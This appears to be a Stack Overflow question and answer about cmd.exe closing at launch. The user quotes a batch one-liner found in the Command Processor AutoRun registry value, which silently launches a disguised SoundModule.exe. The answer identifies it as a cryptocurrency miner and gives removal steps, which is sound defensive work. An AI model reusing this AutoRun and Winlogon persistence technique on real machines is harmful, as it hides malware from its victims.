Search code examples
windowsbatch-filecmdregistry

CMD.exe closes immediately - unusual line in AutoRun registry entry

I've noticed that my command line didn't start anymore, it just immediately minimized and closed itself upon running. I suspect this is due to a virus or at least some kind of malicious program having been executed. I found the following code inside my registry. It seems legible but my knowledge of batch / the command line is limited. Can anyone tell me what it does?

@mode 20,5 & tasklist /FI "IMAGENAME eq SoundModule.exe" 2>NUL | find /I /N "SoundModule.exe">NUL && exit & if exist "C:\Users\Leon\AppData\Roaming\Microsoft\SoundModule\SoundModule.exe" ( start /MIN "" "C:\Users\Leon\AppData\Roaming\Microsoft\SoundModule\SoundModule.exe" & tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit ) else ( tasklist /FI "IMAGENAME eq explorer.exe" 2>NUL | find /I /N "explorer.exe">NUL && exit & explorer.exe & exit )
Solution

  • According to this reddit thread, it's a "vmprotected cryptocurrency miner".

    You most likely got it if you installed anything you downloaded from the torrent network, for example a popular game released in the past few weeks :^)

    The following SO thread contains part of the solution: CMD.exe closes immediately after calling (Win7 64)

    The malicious party added an AutoRun directive via registry to the Windows Command Processor (cmd.exe usually), which you need to remove from any of the following locations it's present in:

    • Computer\HKEY_CURRENT_USER\Software\Microsoft\Command Processor
    • Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor

    What the directive does is to execute SoundModule.exe and then explorer.exe (if not already started).

    According to the other reply in this thread, they set %comspec% to run at startup, via Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon.

    So on startup, it's running %comspec% (instead of the default Windows Explorer), which itself on start first runs SoundModule.exe and then explorer.exe. Not sure why they did it this way, anyone who makes use of cmd.exe was bound to figure it out and spread the word.

    There are at least two confirmed VirusTotal records for this file: [1], [2]